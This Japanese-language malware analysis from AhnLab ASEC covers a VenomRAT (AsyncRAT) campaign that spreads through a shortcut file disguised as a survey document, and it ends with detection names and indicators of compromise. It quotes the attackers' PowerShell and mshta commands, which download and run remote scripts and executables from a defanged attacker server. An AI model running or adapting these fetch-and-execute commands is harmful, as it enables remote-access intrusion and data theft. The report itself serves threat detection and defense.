Posted By ,

韓国国内の IT 企業を騙り配布される VenomRAT(AsyncRAT)

AhnLab SEcurity intelligence Center(ASEC)は、AsyncRAT(VenomRAT)をダウンロードするショートカットファイル(.lnk)を確認した。LNK ファイルは正常な Word ドキュメントを装うために「アンケート.docx.lnk」というファイル名で正常なテキストドキュメントと共に圧縮ファイルで配布された。何よりも、攻撃のプロセスで使用された実行ファイル(blues.exe)が韓国国内企業の認証書に偽装しており、ユーザーは特に注意が必要である。

マルウェアの全般的な動作プロセスは以下の通りである。

図1. 動作プロセス

圧縮ファイルは、ユーザーの閲覧を誘導するために「アンケート」に偽装しており、圧縮ファイルの内部にはテキストドキュメントと不正な LNK ファイルが含まれている。テキストドキュメント内部には、不正な LNK ファイルの実行を誘導するメッセージが記載されている。

図2. readme.txt ファイルの内容

LNK ファイルには不正なコマンドが含まれており、実行すると mshta を通じて外部 URL に接続し、追加のスクリプトコードが実行される。

図3. LNK のプロパティ
  • 実行コマンド
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . $env:C:\W*\S*2\m*h?a.*  ‘hxxp://194.33.191[.]248:7287/docx1.hta’

hxxp://194.33.191[.]248:7287/docx1.hta には難読化された文字列が存在する。これをデコードすると、[図5]のように追加ファイルをダウンロードして %appdata% フォルダーに保存したあと、実行する PowerShell コマンドが確認できる。

  • ダウンロード URL
    hxxp://194.33.191[.]248:7287/qfqe.docx
    hxxp://194.33.191[.]248:7287/blues.exe
図4. docx1.hta に存在するスクリプトコードの一部
図5. デコードされた docx1.hta コードの一部

ダウンロードされた qfqe.docx ファイルは正常な Word ドキュメントであり、アンケート関連の内容を含んでいるため、ユーザーが不正な振る舞いが実行されていることに気づかせにくくしている。

図6. qfqe.docx の本文内容

Word ドキュメントと共にダウンロードされた blues.exe ファイルは、韓国国内 IT 企業の認証書に偽装したダウンローダータイプのマルウェアである。実行すると、PowerShell によって追加のスクリプトコードをダウンロードする。

図7. blues.exe の署名情報
図8. blues.exe コードの一部
  • 実行コマンド
    powershell iwr hxxp://194.33.191[.]248:7287/sys.ps1 -UseBasicParsing | iex

上記の blues.exe ファイルを通じて実行される sys.ps1 もまたダウンローダータイプのマルウェアであり、hxxp://194.33.191[.]248:7287/adb.dll から追加のデータをダウンロードして Fileless 形式で実行する。

図9. sys.ps1 コード

adb.dll の内部にはエンコードされたシェルコードが存在し、Base64 および「sorootktools」文字列との XOR 演算によって復号化される。

図10. adb.dll に含まれたエンコードされたシェルコード

最終的に実行されるシェルコードは RAT タイプのマルウェアである VenomRAT(AsyncRAT)であり、ユーザー PC の情報流出およびキーロガーを実行する。また、攻撃者からコマンドを受け取って様々な不正な振る舞いを実行することができる。

  • C2 : 194.33.191[.]248:4449
図11. VenomRAT(AsyncRAT)コードの一部

正常なドキュメントに偽装した不正なショートカットファイルの拡散が続いている。ショートカットファイルの場合、ファイル名で「.lnk」拡張子が表示されず、正常なドキュメントファイルと勘違いする可能性が高く、ユーザーは特に注意が必要である。

[ファイル検知]
Trojan/LNK.Runner (2024.01.16.00)
Trojan/HTML.Agent.SC196238 (2024.01.17.00)
Trojan/Win.Generic.C5572807 (2024.01.12.03)
Trojan/PowerShell.Agent (2024.01.17.00)
Trojan/Win.Generic.C5337844 (2022.12.21.00)

[振る舞い検知]
Execution/MDP.Powershell.M2514

[IOC 情報]

MD5
2dfaa1dbd05492eb4e9d0561bd29813b
f57918785e7cd4f430555e6efb00ff0f
e494fc161f1189138d1ab2a706b39303
2d09f6e032bf7f5a5d1203c7f8d508e4
335b8d0ffa6dffa06bce23b5ad0cf9d6

C&C
hxxp://194.33.191[.]248:7287/docx1.hta
hxxp://194.33.191[.]248:7287/qfqe.docx
hxxp://194.33.191[.]248:7287/blues.exe
hxxp://194.33.191[.]248:7287/sys.ps1
hxxp://194.33.191[.]248:7287/adb.dll
194.33.191[.]248:4449

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。

Categories: マルウェアの情報

Tagged as: ,